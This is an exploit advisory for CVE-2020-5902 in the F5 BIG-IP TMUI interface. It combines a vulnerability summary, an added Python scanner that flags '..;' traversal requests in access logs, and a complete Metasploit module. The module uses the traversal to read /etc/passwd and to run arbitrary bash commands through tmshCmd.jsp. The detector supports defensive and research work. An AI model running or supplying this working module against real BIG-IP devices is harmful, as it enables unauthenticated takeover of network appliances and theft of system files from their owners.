=============================================================================================================================================
# Title     : F5 BIG-IP TMUI Unauthenticated Remote Code Execution
# Author    : indoushka
# Tested on : windows 11 Fr(Pro) / browser : Mozilla Firefox 147.0.4 (64 bits)
# Vendor    : https://www.f5.com/fr_fr/products/big-ip
=============================================================================================================================================

[+] Summary :

A critical vulnerability exists in the Traffic Management User Interface (TMUI) component of F5 Networks BIG-IP devices that allows unauthenticated attackers to perform remote command execution (RCE) through a directory traversal flaw. The issue is tracked as CVE-2020-5902 and affects multiple versions of BIG-IP where the TMUI administrative interface is exposed.

The vulnerability stems from improper input validation in TMUI endpoints such as fileRead.jsp and tmshCmd.jsp. By requesting a crafted path containing the traversal sequence "..;", an attacker can bypass authentication and reach internal JSP components. This allows:

 - Arbitrary file read (e.g., /etc/passwd)
 - Execution of system commands via tmsh utilities
 - Full compromise of the affected BIG-IP system

Attackers can issue specially crafted HTTP requests to the vulnerable TMUI interface, enabling them to execute commands as the underlying system user without authentication.

[+] Successful exploitation may result in:

 - Remote command execution on the device
 - Disclosure of sensitive system files
 - Complete takeover of the BIG-IP appliance
 - Potential network pivoting if the device sits in a trusted infrastructure position

[+] This vulnerability was publicly disclosed on 1 July 2020 and is considered critical severity, with active exploitation observed shortly after disclosure.
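As an added defender-side example that is not part of the original advisory: a small Python scan over web-server access-log lines that flags the "..;" traversal against /tmui/ paths and the fileRead.jsp / tmshCmd.jsp endpoints named above. The Common Log Format layout, the sample lines and the indicator labels are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# TMUI endpoints named in the advisory, and the query parameters it ties to file read / command execution.
SENSITIVE_JSPS = {"fileRead.jsp", "tmshCmd.jsp"}
INTERESTING_PARAMS = {"fileName", "command"}
# Common Log Format (assumed); the request target (path + query) is what gets inspected.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify_request(target):
    """Return indicator labels for one request target, or [] if nothing matches."""
    decoded = unquote(target)          # normalise one layer of percent-encoding before matching
    parts = urlsplit(decoded)          # urlsplit keeps ';' inside the path component
    path = parts.path
    indicators = []
    if "/tmui/" in path and "..;" in path:
        indicators.append("tmui-semicolon-traversal")
    last_segment = path.rsplit("/", 1)[-1]
    if last_segment in SENSITIVE_JSPS:
        indicators.append("sensitive-jsp:" + last_segment)
    for name in sorted(INTERESTING_PARAMS.intersection(parse_qs(parts.query))):
        indicators.append("param:" + name)
    return indicators

def scan_log(lines):
    """Return one dict per suspicious request, in log order; non-CLF lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m["target"])
        if indicators:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "target": m["target"], "indicators": indicators})
    return hits

# Constructed sample log lines (not real traffic): a normal login-page hit, the two
# traversal requests described in the advisory, and an unrelated 404.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2020:12:00:00 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jul/2020:12:00:01 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1873',
    '203.0.113.7 - - [01/Jul/2020:12:00:02 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=show+sys+version HTTP/1.1" 200 642',
    '198.51.100.4 - - [01/Jul/2020:12:00:03 +0000] "GET /index.html HTTP/1.1" 404 210',
]
if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ", ".join(hit["indicators"]), hit["target"])
```

A 200 status on a flagged request is the signal to treat seriously; a 404 on the same path is consistent with the vendor mitigation being in place.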
Affected Product : F5 BIG-IP TMUI
Vendor           : F5 Networks
CVE              : CVE-2020-5902

[+] Impact:

 - Unauthenticated Remote Code Execution
 - Arbitrary File Disclosure
 - Full System Compromise

[+] POC :

##
# Exploit Title: F5 BIG-IP TMUI Remote Code Execution
# Framework: Metasploit
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'F5 BIG-IP TMUI Remote Code Execution',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the
        F5 BIG-IP TMUI interface that allows unauthenticated attackers
        to execute arbitrary system commands via tmshCmd.jsp.
      },
      'Author'         => [ 'indoushka' ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2020-5902'],
        ['URL', 'https://support.f5.com/csp/article/K52145254']
      ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_CMD ],
      'Targets'        => [ ['Automatic Target', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2020-07-01'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
        OptString.new('FILEPATH', [ false, 'File to read for vulnerability check', '/etc/passwd' ])
      ]
    )
  end

  def check
    print_status("Checking if target is vulnerable...")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(
        target_uri.path,
        'tmui', 'login.jsp', '..;',
        'tmui', 'locallb', 'workspace', 'fileRead.jsp'
      ),
      'vars_get' => {
        'fileName' => datastore['FILEPATH']
      }
    })

    return CheckCode::Unknown unless res

    if res.code == 200 && res.body.include?('root:')
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end

  def exploit
    print_status("Launching exploit...")
    execute_command(payload.encoded)
  end

  def execute_command(cmd, opts = {})
    vprint_status("Executing command: #{cmd}")

    encoded = Rex::Text.uri_encode("run util bash -c '#{cmd}'")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(
        target_uri.path,
        'tmui', 'login.jsp', '..;',
        'tmui', 'locallb', 'workspace', 'tmshCmd.jsp'
      ),
      'vars_get' => {
        'command' => encoded
      }
    })

    fail_with(Failure::Unknown, "No response from server") unless res
  end
end

Greetings to :
==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)
==============================================================================